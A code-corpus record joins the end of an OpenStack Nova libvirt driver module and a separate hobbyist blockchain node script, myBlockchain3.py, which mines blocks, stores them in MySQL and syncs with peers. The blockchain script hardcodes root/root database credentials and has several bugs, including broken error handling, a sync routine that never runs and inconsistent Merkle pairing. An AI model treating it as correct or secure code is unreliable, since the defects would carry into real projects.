# should be fairly thread-safe without these additional checks, since
# other operations involving renames are not permitted when the task
# state is not None and the task state should be set to something
# other than None by the time this method is invoked.
target_del = target + '_del'
for i in six.moves.range(2):
try:
utils.execute('mv', target, target_del)
break
except Exception:
pass
try:
utils.execute('mv', target_resize, target_del)
break
except Exception:
pass
# Either the target or target_resize path may still exist if all
# rename attempts failed.
remaining_path = None
for p in (target, target_resize):
if os.path.exists(p):
remaining_path = p
break
# A previous delete attempt may have been interrupted, so target_del
# may exist even if all rename attempts during the present method
# invocation failed due to the absence of both target and
# target_resize.
if not remaining_path and os.path.exists(target_del):
LOG.info(_LI('Deleting instance files %s'), target_del,
instance=instance)
remaining_path = target_del
try:
shutil.rmtree(target_del)
except OSError as e:
LOG.error(_LE('Failed to cleanup directory %(target)s: '
'%(e)s'), {'target': target_del, 'e': e},
instance=instance)
# It is possible that the delete failed, if so don't mark the instance
# as cleaned.
if remaining_path and os.path.exists(remaining_path):
LOG.info(_LI('Deletion of %s failed'), remaining_path,
instance=instance)
return False
LOG.info(_LI('Deletion of %s complete'), target_del, instance=instance)
return True
@property
def need_legacy_block_device_info(self):
return False
def default_root_device_name(self, instance, image_meta, root_bdm):
disk_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "disk")
cdrom_bus = blockinfo.get_disk_bus_for_device_type(
CONF.libvirt.virt_type, image_meta, "cdrom")
root_info = blockinfo.get_root_info(
CONF.libvirt.virt_type, image_meta, root_bdm, disk_bus,
cdrom_bus)
return block_device.prepend_dev(root_info['dev'])
def default_device_names_for_instance(self, instance, root_device_name,
*block_device_lists):
ephemerals, swap, block_device_mapping = block_device_lists[:3]
blockinfo.default_device_names(CONF.libvirt.virt_type,
nova_context.get_admin_context(),
instance, root_device_name,
ephemerals, swap,
block_device_mapping)
def is_supported_fs_format(self, fs_type):
return fs_type in [disk.FS_FORMAT_EXT2, disk.FS_FORMAT_EXT3,
disk.FS_FORMAT_EXT4, disk.FS_FORMAT_XFS]
class HostState(object):
"""Manages information about the compute node through libvirt."""
def __init__(self, driver):
super(HostState, self).__init__()
self._stats = {}
self.driver = driver
self.update_status()
def get_host_stats(self, refresh=False):
"""Return the current state of the host.
If 'refresh' is True, run update the stats first.
"""
if refresh or not self._stats:
self.update_status()
return self._stats
def update_status(self):
"""Retrieve status info from libvirt."""
def _get_disk_available_least():
"""Return total real disk available least size.
The size of available disk, when block_migration command given
disk_over_commit param is FALSE.
The size that deducted real instance disk size from the total size
of the virtual disk of all instances.
"""
disk_free_gb = disk_info_dict['free']
disk_over_committed = (self.driver.
_get_disk_over_committed_size_total())
# Disk available least size
available_least = disk_free_gb * units.Gi - disk_over_committed
return (available_least / units.Gi)
LOG.debug("Updating host stats")
disk_info_dict = self.driver._get_local_gb_info()
data = {}
# NOTE(dprince): calling capabilities before getVersion works around
# an initialization issue with some versions of Libvirt (1.0.5.5).
# See: https://bugzilla.redhat.com/show_bug.cgi?id=1000116
# See: https://bugs.launchpad.net/nova/+bug/1215593
data["supported_instances"] = \
self.driver._get_instance_capabilities()
data["vcpus"] = self.driver._get_vcpu_total()
data["memory_mb"] = self.driver._get_memory_mb_total()
data["local_gb"] = disk_info_dict['total']
data["vcpus_used"] = self.driver._get_vcpu_used()
data["memory_mb_used"] = self.driver._get_memory_mb_used()
data["local_gb_used"] = disk_info_dict['used']
data["hypervisor_type"] = self.driver._get_hypervisor_type()
data["hypervisor_version"] = self.driver._get_hypervisor_version()
data["hypervisor_hostname"] = self.driver._get_hypervisor_hostname()
data["cpu_info"] = self.driver._get_cpu_info()
data['disk_available_least'] = _get_disk_available_least()
data['pci_passthrough_devices'] = \
self.driver._get_pci_passthrough_devices()
self._stats = data
return data
|
myBlockchain3.py
|
import hashlib
import time
import csv
import random
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
import json
import re
from urllib.parse import parse_qs
from urllib.parse import urlparse
import threading
import cgi
import uuid
from tempfile import NamedTemporaryFile
import shutil
import requests
import pymysql
from sqlalchemy import create_engine
import pandas as pd
import socket
IP_NUMBER = "127.0.0.1"
# socket.gethostbyname(socket.getfqdn())
PORT_NUMBER = 8099
#Set the information in the database that will be linked to this code.
DATABASE_SVR_NAME = "databasebc"
DATABASE_SVR_IP = 'localhost'
DATABASE_SVR_PORT = 3300
DATABASE_SVR_USER = "root"
DATABASE_SVR_PW = "root"
DATABASE_BC_TABLE = "blockchain"
DATABASE_ND_TABLE = "node"
#Set the ip aderess and port number of the transaction pool database.
DATABASE_TPSVR_IP = "http://localhost:8089"
#Set the ip address and port number of the miner list.
#miner list = The IP address and port number where the code is running.
DATABASE_MINER_LIST_IP = "http://localhost"
DATABASE_MINER_LIST_PORT = 8081
#a variable that determines whether it is a 'master' or a 'serve'.
MASTER = True
SERVE = False
g_difficulty = 2
class Block:
def __init__(self, index, previousHash, timestamp, data, currentHash, proof, merkleHash):
self.index = index
self.previousHash = previousHash
self.timestamp = timestamp
self.data = data
self.currentHash = currentHash
self.proof = proof
self.merkleHash = merkleHash
def toJSON(self):
return json.dumps(self, default=lambda o: o.__dict__, sort_keys=True, indent=4)
class txData:
def __init__(self, commitYN, sender, amount, receiver, fee, uuid, transactionTime):
self.commitYN = commitYN
self.sender = sender
self.amount = amount
self.receiver = receiver
self.fee = fee
self.uuid = uuid
self.transactionTime = transactionTime
class Node:
def __init__(self, ip, port, tryConnect):
self.ip = ip
self.port = port
self.tryConnect = tryConnect
#Generates the Genesis block.
def generateGenesisBlock(timestamp, proof):
isSuccess = True
newBlock = None
GenesisTxData = [{"commitYN" : "0", "sender": "Genesis Block", "amount": "0", \
"receiver": "kim", "fee": "0"}]
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
try:
URL = DATABASE_TPSVR_IP + "/txData/new"
res = requests.post(URL, headers=reqHeader, data=json.dumps(GenesisTxData))
if res.status_code == 200:
print("Genesis txData sent ok.")
txData, txTF = getTxData(0)
merkleHash = calculateMerkleHash(txData)
tempHash = calculateHash(0, '0', timestamp, proof, merkleHash)
genesisBlockData = getStrTxData(txData)
newBlock = Block(0, '0', timestamp, genesisBlockData, tempHash, proof, merkleHash)
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("transaction_pool server : " + DATABASE_TPSVR_IP + " is not responding.")
isSuccess = False
finally:
if isSuccess:
print("Success to generate genesis block : \n" + str(newBlock.__dict__))
return newBlock, isSuccess
#Creates a hash of the block.
def calculateHash(index, previousHash, timestamp, proof, merkleHash):
value = str(index) + str(previousHash) + str(timestamp) + str(proof) + merkleHash
sha = hashlib.sha256(value.encode('utf-8'))
return str(sha.hexdigest())
#Returns a list of txData objects in a single string.
def getStrTxData(txData) :
strTxData = ''
if len(txData) > 0:
for i in txData:
transaction = "[" + i['uuid'] + "]" "UserID " + i['sender'] + " sent " + i['amount'] + " bitTokens to UserID " + \
i['receiver'] + " fee "+ i['fee'] + " transaction time " + str(i['transactionTime']) + ". "
print(transaction)
strTxData += transaction
return strTxData
#Create a Muckle hash.
def calculateMerkleHash(txData) :
txDataList = []
print("hash merkling..................")
if len(txData) > 0:
for i in txData:
transaction = "[" + i['uuid'] + "]" "UserID " + i['sender'] + " sent " + i['amount'] + " bitTokens to UserID " + \
i['receiver'] + " fee "+ i['fee'] + " transaction time " + str(i['transactionTime']) + ". "
print(transaction)
txDataList.append(transaction)
return rcGetMerkleHash(txDataList)
#Create and return a muckle hash through recursion.
def rcGetMerkleHash(target) :
strBinaryTxData = ""
#check
print("current len of Target = " + str(len(target)))
endIndexOfTarget = len(target) - 1
if len(target) <= 1 :
sha = hashlib.sha256(target[0].encode('utf-8'))
return str(sha.hexdigest())
else :
newTarget = []
for i in range(endIndexOfTarget - 1):
if i % 2 == 0 :
strBinaryTxData = strBinaryTxData + target[i] + target[i+1]
sha = hashlib.sha256(target[i].encode('utf-8'))
newTarget.append(str(sha.hexdigest()))
if (len(target) % 2) != 0:
sha = hashlib.sha256(target[endIndexOfTarget].encode('utf-8'))
newTarget.append(str(sha.hexdigest()))
else :
strBinaryTxData = strBinaryTxData + target[endIndexOfTarget-1] + target[endIndexOfTarget]
sha = hashlib.sha256(strBinaryTxData.encode('utf-8'))
newTarget.append(str(sha.hexdigest()))
return rcGetMerkleHash(newTarget)
#Calculate and return the hash based on the information in the block.
def calculateHashForBlock(block):
return calculateHash(block.index, block.previousHash, block.timestamp, block.proof, block.merkleHash)
#Returns the most recently created block.
def getLatestBlock(blockchain):
lengthOfBlockChain = len(blockchain) - 1
if len(blockchain) == 0 :
lengthOfBlockChain = 0;
return blockchain[lengthOfBlockChain]
#Generate the next block.
def generateNextBlock(blockList, txData, timestamp, proof):
print("Trying to generate next block...........")
isSuccess = True
newBlock = None
try:
previousBlock = getLatestBlock(blockList)
nextIndex = int(previousBlock.index) + 1
nextTimestamp = timestamp
strTxData = getStrTxData(txData)
merkleHash = calculateMerkleHash(txData)
newBlockFound = False
while not newBlockFound :
nextHash = calculateHash(nextIndex, previousBlock.currentHash, nextTimestamp, proof, merkleHash)
if nextHash[0:g_difficulty] == '0' * g_difficulty:
newBlockFound = True
else:
proof += 1
newBlock = Block(nextIndex, previousBlock.currentHash, nextTimestamp, strTxData, nextHash, proof, merkleHash)
except :
print("Fail to mine next block")
isSuccess = False
if isSuccess :
print("Success to generate next block : \n" + str(newBlock.__dict__))
return newBlock, isSuccess
#Enter the information of the block into the table in the linked database.
def writeBlockchain(blockchain):
print("Trying write block to blockchain table..........")
tableBlockList, readSuccess = readBlockchain()
isSuccess = True
if readSuccess :
if len(tableBlockList) != 0 :
lastBlock = getLatestBlock(tableBlockList)
if lastBlock.index + 1 != blockchain.index :
print("Failed to write new block to database. new block is invalid.")
isSuccess = False
if isSuccess :
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
try:
with conn.cursor() as curs:
print(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash)
sql = "INSERT INTO " + DATABASE_BC_TABLE + " VALUES (%s,%s,%s,%s,%s,%s,%s)"
curs.execute(sql,(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash))
conn.commit()
except :
print("Failed to insert new block on database.")
finally:
conn.close()
else :
print("Failed to read blockchain data from database")
isSuccess = False
if isSuccess :
print("Succeed to write new block on database.")
return isSuccess
#Insert the block information of the block object list in the table of the linked database.
def writeAllBlockchain(blockchainList):
result = 1
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
try:
print("Trying delete all data on table " + DATABASE_BC_TABLE + " for renewal...........")
with conn.cursor() as curs:
sql = "DELETE FROM " + DATABASE_BC_TABLE
curs.execute(sql)
conn.commit()
except:
print("Failed to delete all data.")
result = -1
finally:
conn.close()
print("Trying write block to blockchain table..........")
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset = 'utf8')
try:
for blockchain in blockchainList:
with conn.cursor() as curs:
print(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash)
sql = "INSERT INTO " + DATABASE_BC_TABLE + " VALUES (%s,%s,%s,%s,%s,%s,%s)"
curs.execute(sql,(blockchain.index, blockchain.previousHash, str(blockchain.timestamp), \
blockchain.data, blockchain.currentHash, blockchain.proof, blockchain.merkleHash))
conn.commit()
except :
print("Failed to insert new block on database.")
result = -1
finally:
conn.close()
if result == 1 :
print("Succeed to write new block on database.")
return result
#Returns all block information in the table in the database.
def readBlockchain():
print("readBlockchain")
isSuccess = False
blockDataList = []
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME + "...........")
with conn.cursor() as cursor :
sql = "select * from " + DATABASE_BC_TABLE
cursor.execute(sql)
rows = cursor.fetchall()
for data in rows:
block = Block(data[0], data[1], data[2], data[3], data[4], data[5], data[6])
blockDataList.append(block)
isSuccess = True
except:
print("Failed to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
if isSuccess :
print("Success to read blockchain data from " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
return blockDataList, isSuccess
#Request an update for the transaction details used to create the block to The transaction pool server.
def updateTx(blockData, mode = 'update'):
isSuccess = True
if mode == 'update' :
query = '/txData/update'
print("response update mode : 0 -> 1")
else :
query = '/txData/rollBack'
print("response rollback mode : 1 -> 0")
phrase = re.compile(
r"\w+[-]\w+[-]\w+[-]\w+[-]\w+")
print(blockData.data)
matchList = phrase.findall(blockData.data)
print(matchList)
if len(matchList) == 0:
print("No Match Found! " + str(blockData.data) + "block idx: " + str(blockData.index))
isSuccess = False
else :
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
blockDict = []
blockDict.append(blockData.__dict__)
print(blockDict)
try:
URL = DATABASE_TPSVR_IP + query
print(URL)
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDict))
if res.status_code == 200:
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("transaction Server " + URL + " is not responding.")
isSuccess = False
if isSuccess :
if mode == 'update' :
print('Succeed to update')
else :
print('Succeed to rollback')
return isSuccess
#Request transaction details with a value of zero 'commitYN' or the entire transaction details.
def getTxData(chooseData):
url = DATABASE_TPSVR_IP + "/getTxData/zero"
if (chooseData == 1) :
url = DATABASE_TPSVR_IP + "/getTxData/all"
txData = []
isSuccess = True
try :
print("Trying to get txData from " + DATABASE_TPSVR_IP + "...........")
res = requests.get(url=url)
if res.status_code == 200 :
txData = json.loads(res.text)
res.close()
else :
isSuccess = False
except:
isSuccess = False
return txData, isSuccess
#Mining new blocks.
def mineNewBlock():
blockList, blockTF = readBlockchain()
urlData, txTF = getTxData(0)
timestamp = time.time()
proof = 0
if blockTF and txTF :
if len(blockList) == 0 :
newBlock, generateSuccessBc = generateGenesisBlock(timestamp, proof)
else:
newBlock, generateSuccessBc = generateNextBlock(blockList, urlData, timestamp, proof)
print(newBlock, generateSuccessBc)
if generateSuccessBc :
upResult = updateTx(newBlock, mode = 'update')
else :
print("mineNewBlock : Failed to generate NewBlock")
return
if upResult :
wrResult = writeBlockchain(newBlock)
else :
print("mineNewBlock : Failed to update txdata on transaction pool table used create block")
rollBackSuccess = updateTx(newBlock, mode = 'rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
if wrResult :
print("mineNewBlock : Succeed to write new block on table ")
broadResult = broadcastNewBlock(newBlock)
else :
print("mineNewBlock : Fail to write new block on table ")
rollBackSuccess = updateTx(newBlock, mode='rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
if broadResult :
print("mineNewBlock : Succeed broadcasting new block")
return
else :
print("mineNewBlock : Failed to broadcasting new block")
syncSuccess = syncBlockChain()
if (syncSuccess == 1) or (syncSuccess == 2) or (syncSuccess == -2) or (syncSuccess == -1):
print("mineNewBlock : Succeed to sync all block data")
else :
print("mineNewBlock : Failed to sync all block data")
rollBackSuccess = updateTx(newBlock, mode='rollback')
if rollBackSuccess :
print("mineNewBlock : Succeed to rollback txData")
return
else :
print("mineNewBlock : There's no Transaction pool data in Url.")
return
def mine():
mineNewBlock()
#Validate blocks.
def isSameBlock(block1, block2):
if str(block1.index) != str(block2.index):
return False
elif str(block1.previousHash) != str(block2.previousHash):
return False
elif str(block1.timestamp) != str(block2.timestamp):
return False
elif str(block1.data) != str(block2.data):
return False
elif str(block1.currentHash) != str(block2.currentHash):
return False
elif str(block1.proof) != str(block2.proof):
return False
elif str(block1.merkleHash) != str(block2.merkleHash):
return False
return True
#Validate newly generated blocks.
def isValidNewBlock(newBlock, previousBlock):
if int(previousBlock.index) + 1 != int(newBlock.index):
print('Indices Do Not Match Up')
return False
# 체이닝이 맞는지
elif previousBlock.currentHash != newBlock.previousHash:
print("Previous hash does not match")
return False
# 해쉬검증
elif calculateHashForBlock(newBlock) != newBlock.currentHash:
print("Hash is invalid")
return False
elif newBlock.currentHash[0:g_difficulty] != '0' * g_difficulty:
print("Hash difficulty is invalid")
return False
return True
#Validate the validity of the blockchain.
def isValidChain(bcToValidate):
genesisBlock = []
bcToValidateForBlock = []
# Read GenesisBlock
try:
blockReader, readSuccess = readBlockchain()
for line in blockReader:
block = Block(line[0], line[1], line[2], line[3], line[4], line[5], line[6])
genesisBlock.append(block)
except:
print("file open error in isValidChain")
return False
# transform given data to Block object
for line in bcToValidate:
# print(type(line))
# index, previousHash, timestamp, data, currentHash, proof
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'], line['currentHash'],
line['proof'], line['merkleHash'])
bcToValidateForBlock.append(block)
# if it fails to read block data from db(csv)
if not genesisBlock:
print("fail to read genesisBlock")
return False
# compare the given data with genesisBlock
if not isSameBlock(bcToValidateForBlock[0], genesisBlock[0]):
print('Genesis Block Incorrect')
return False
# tempBlocks = [bcToValidateForBlock[0]]
# for i in range(1, len(bcToValidateForBlock)):
# if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
# tempBlocks.append(bcToValidateForBlock[i])
# else:
# return False
for i in range(0, len(bcToValidateForBlock)):
if isSameBlock(genesisBlock[i], bcToValidateForBlock[i]) == False:
return False
return True
#Insert the requested ip address and port number into the node table of the linked database.
#Ask each server for the requested ip address and port number to synchronize the node tables of each server's database.
def addNode(recievedNode, mode='new'):
isSuccess = True
for getNode in recievedNode :
if mode == 'new':
newNode = Node(getNode['ip'], str(getNode['port']), "0")
else:
newNode = Node(getNode['ip'], str(getNode['port']), str((getNode['tryConnect'])))
sameNodeFound = False
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER, passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to find new node on database...........")
with conn.cursor() as cursor:
sql = "Select ip, port FROM " + DATABASE_ND_TABLE + " WHERE ip = %s AND port = %s"
cursor.execute(sql, (newNode.ip, newNode.port))
rows = cursor.fetchall()
conn.commit()
if len(rows) != 0:
print("new node is already existed.")
sameNodeFound = True
except:
print("Failed to access nodelist database.")
isSuccess = False
finally:
conn.close()
if not sameNodeFound :
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME, charset='utf8')
try:
print("Trying to add new node on database...........")
with conn.cursor() as curs:
sql = "INSERT INTO " + DATABASE_ND_TABLE + " VALUES (%s,%s,%s)"
curs.execute(sql, (newNode.ip, newNode.port, newNode.tryConnect))
conn.commit()
print('Success to write new node on' + DATABASE_ND_TABLE + ".")
except:
print("Failed to access nodelist database.")
isSuccess = False
finally:
conn.close()
else:
isSuccess = False
if mode == 'new' :
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
newNodeList = []
newNodeList.append(newNode.__dict__)
serverData = []
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
print(URL)
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("serverlist Server " + URL + " is not responding.")
isSuccess = False
for i in serverData:
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
URL = "http://" + i['ip'] + ":" + i['port'] + "/postNode/newSvr"
print(URL)
try:
print("trying send added node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST...........")
res = requests.post(URL, headers=reqHeader, data=json.dumps(newNodeList))
if res.status_code == 200:
print("sent ok.")
else:
print("Failed to send new node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST >> 404")
except:
print("Failed to send new node to " + i['ip'] + ":" + i['port'] + " in SVR_LIST >> not responding")
return isSuccess
#Returns all data in the nodelist table in the database.
def readNodes() :
nodeDictList = []
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
passwd=DATABASE_SVR_PW, \
database=DATABASE_SVR_NAME)
sql = "SELECT * FROM " + DATABASE_ND_TABLE
try :
with conn.cursor() as curs :
curs.execute(sql)
nodeList = curs.fetchall()
for line in nodeList :
node = Node(line[0], line[1], line[2])
nodeDictList.append(node.__dict__)
except:
print("Failed to get node data from database.")
finally:
conn.close()
return nodeDictList
#Counts rows in the database.
def row_count():
try:
list, readSuccess = readBlockchain()
return len(list)
except:
return 0
#Compare the block data contained in the requested URL with your block data
#and synchronize the data according to the results.
def compareMerge(bcDict):
bcToValidateForBlock = []
heldBlock = []
try:
blockchainList, readSuccess = readBlockchain()
heldBlock = blockchainList
except:
print("file open error in compareMerge or No database exists")
return -1
if len(heldBlock) == 0:
print("fail to read")
return -2
for line in bcDict:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'], line['currentHash'],
line['proof'], line['merkleHash'])
bcToValidateForBlock.append(block)
#Compare the requested URL's Genesis block with mine's.
if not isSameBlock(bcToValidateForBlock[0], heldBlock[0]):
print('Genesis Block Incorrect')
return -1
if not isValidNewBlock(bcToValidateForBlock[-1], heldBlock[-1]):
#Compare the requested URL's the latest block with my latest's.
if isSameBlock(heldBlock[-1], bcToValidateForBlock[-1]):
print('latest block == broadcasted last block, already updated')
return 2
#Compare the length of block data
elif len(bcToValidateForBlock) > len(heldBlock):
if not isSameBlock(heldBlock[0], bcToValidateForBlock[0]):
print("Block Information Incorrect #1")
return -1
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(heldBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
return -1
for j in range(len(heldBlock), len(bcToValidateForBlock)) :
tempBlocks.append(bcToValidateForBlock[j])
writeAllBlockchain(bcToValidateForBlock)
return 1
elif len(bcToValidateForBlock) < len(heldBlock):
tempBlocks = [heldBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(heldBlock[i], tempBlocks[i - 1]):
tempBlocks.append(heldBlock[i])
else:
return -1
print(len(heldBlock))
for j in range(len(bcToValidateForBlock), len(heldBlock)):
print(j)
tempBlocks.append(heldBlock[j])
print("We have a better chain")
return 3
elif len(bcToValidateForBlock) == len(heldBlock) :
for i in range (len(heldBlock) - 1, 0, -1):
if float(bcToValidateForBlock[i]['timestamp']) > float(heldBlock[i]['timestamp']) :
tempBlocks = [heldBlock[0]]
for i in range(1, len(heldBlock)):
if isValidNewBlock(heldBlock[i], tempBlocks[i - 1]):
tempBlocks.append(heldBlock[i])
else:
return -1
print("We have a better chain")
return 3
elif float(bcToValidateForBlock[i]['timestamp']) < float(heldBlock[i]['timestamp']):
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
return -1
writeAllBlockchain(bcToValidateForBlock)
return 1
print("Block Information Incorrect")
return -2
else:
print("Block Information Incorrect #2")
return -1
else: # very normal case (ex> we have index 100 and receive index 101 ...)
tempBlocks = [bcToValidateForBlock[0]]
for i in range(1, len(bcToValidateForBlock)):
if isValidNewBlock(bcToValidateForBlock[i], tempBlocks[i - 1]):
tempBlocks.append(bcToValidateForBlock[i])
else:
print("Block Information Incorrect #2 \n" + tempBlocks.__dict__)
return -1
print("new block good")
# validation
for i in range(0, len(heldBlock)):
if isSameBlock(heldBlock[i], bcToValidateForBlock[i]) == False:
print("Block Information Incorrect #1")
return -1
# [START] save it to csv
writeAllBlockchain(bcToValidateForBlock)
return 1
#Notifies servers in the list of servers that a new block has been created.
def broadcastNewBlock(block):
isSuccess = True
blockDictList = []
blockDictList.append(block.__dict__)
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
isSuccess = False
except:
print("serverlist Server " + URL + " is not responding.")
isSuccess = False
if isSuccess :
# request.post로 SVR_LIST의 모든 ip에 /validatedBock으로 보낸다.
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
resDictData = {'validationResult': 'abnormal'}
try:
for i in serverData :
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
print("Trying to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/postBlock/validateBlock"
print("Trying to send : " + URL)
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDictList))
if res.status_code == 200:
print("sent ok.")
resDictData = json.loads(res.text)
print(resDictData)
else:
print("Failed to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST >> not responding : 404")
isSuccess = False
except:
print("Failed to send blockchain data in SVR_LIST >> not responding")
isSuccess = False
#응답이 abnormal 이라면 블록체인의 채굴에 실패로 간주 한다.
resultDict = resDictData.get('validationResult', 'abnormal')
print("current result : " + resultDict)
if resultDict == 'abnormal' :
print("Failed to broadcast new block")
isSuccess = False
# 응답에 리스트가 []이거나 nomal 이라면 브로드캐스팅에 성공, 채굴을 완료한다.
else :
print("Succeed to broadcast new block")
return isSuccess
#Synchronize my block data with the block data of servers in the list of servers.
#The synchronization process is based on the results of comareMerge executed on the server
#from which the request was sent.
def syncBlockChain() :
print("Trying to sync blockchain data with SVR_LIST...........")
blockList, readSuccess = readBlockchain()
result = 0
lengthCount = 0
blockDictList = []
for block in blockList :
blockDictList.append(block.__dict__)
query = "serverList/get"
URL = DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "/" + query
try:
print("Trying to get serverList from " + DATABASE_MINER_LIST_IP + ":" + str(DATABASE_MINER_LIST_PORT) + "...........")
print(URL)
res = requests.get(URL)
if res.status_code == 200:
serverData = json.loads(res.text)
print("sent ok.")
else:
print(URL + " responding error " + 404)
result.append = -1
except:
print("serverlist Server " + URL + " is not responding.")
result -1
if result == 1:
reqHeader = {'Content-Type': 'application/json; charset=utf-8'}
blockData = []
for i in serverData :
if IP_NUMBER == i['ip'] and str(PORT_NUMBER) == i['port']:
continue
else:
print("Trying to send blockchain data to " + i['ip'] + " : " + i['port'] + " in SVR_LIST...........")
URL = "http://" + i['ip'] + ":" + i['port'] + "/postBlock/sync"
try :
res = requests.post(URL, headers=reqHeader, data=json.dumps(blockDictList))
if res.status_code == 200:
print("sent ok.")
resData = json.loads(res.text)
if (resData[-1] == "we have a better chain"):
resData.pop()
if (len(resData) > lengthCount):
lengthCount = len(resData)
blockData = resData
elif (len(resData) == lengthCount):
for i in range(len(resData) - 1, 0, -1):
if float(resData[i]['timestamp']) < float(blockData[i]['timestamp']):
lengthCount = len(resData)
blockData = resData
if result == 3 or result == 0 :
result = 3
else:
resData = json.loads(res.text)
print("resData : " + str(resData[-1]))
if resData[-1] =="block chain info incorrect" :
result = -2
elif resData[-1] == "internal server error" :
result = -1
elif resData[-1] == "accepted" :
result = 1
else :
result = 2
else:
print("Failed to send blockchain data to " + i['ip'] + " : " + i['port']
+ " in SVR_LIST >> not responding : 404")
result = -1
except:
print("Failed to send blockchain data to in SVR_LIST >> not responding")
result = -1
if (len(blockData) > 0):
receivedBlock = []
for line in blockData:
block = Block(line['index'], line['previousHash'], line['timestamp'], line['data'],
line['currentHash'], \
line['proof'], line['merkleHash'])
receivedBlock.append(block)
writeAllBlockchain(receivedBlock)
if result == 3 or result == 0 :
result = 3
if result == 1 :
print("Succeed to sync blockchain")
return result
#Create blockchain and model list tables in the linked database and
#synchronize tables sequentially with servers in the list of servers for services.
def initSvr():
#Decide directly whether master or serve.
isMasterSvr = MASTER
if isMasterSvr :
print("server : MASTER mode")
else :
print("server : SERVE mode")
#create blockchain table and nodelist table.
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, db=DATABASE_SVR_NAME, charset='utf8')
try:
sql = "CREATE TABLE " + DATABASE_BC_TABLE + "(" \
"idx int," \
"Hash varchar(255)," \
"timeStamp varchar(255)," \
"data longtext," \
"currentHash varchar(255)," \
"proof varchar(255)," \
"merkleHash varchar(255)" \
")"
with conn.cursor() as curs:
curs.execute(sql)
print("Success to create blockchain table " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
except:
print("Failed to create blockchain table " + DATABASE_BC_TABLE + " on " + DATABASE_SVR_NAME)
finally:
conn.close()
conn = pymysql.connect(host=DATABASE_SVR_IP, port=DATABASE_SVR_PORT, user=DATABASE_SVR_USER,
password=DATABASE_SVR_PW, \
db=DATABASE_SVR_NAME, charset='utf8')
try:
sql = "CREATE TABLE " + DATABASE_ND_TABLE + "(" \
"ip varchar(255)," \
"port varchar(255)," \
"tryConnect int" \
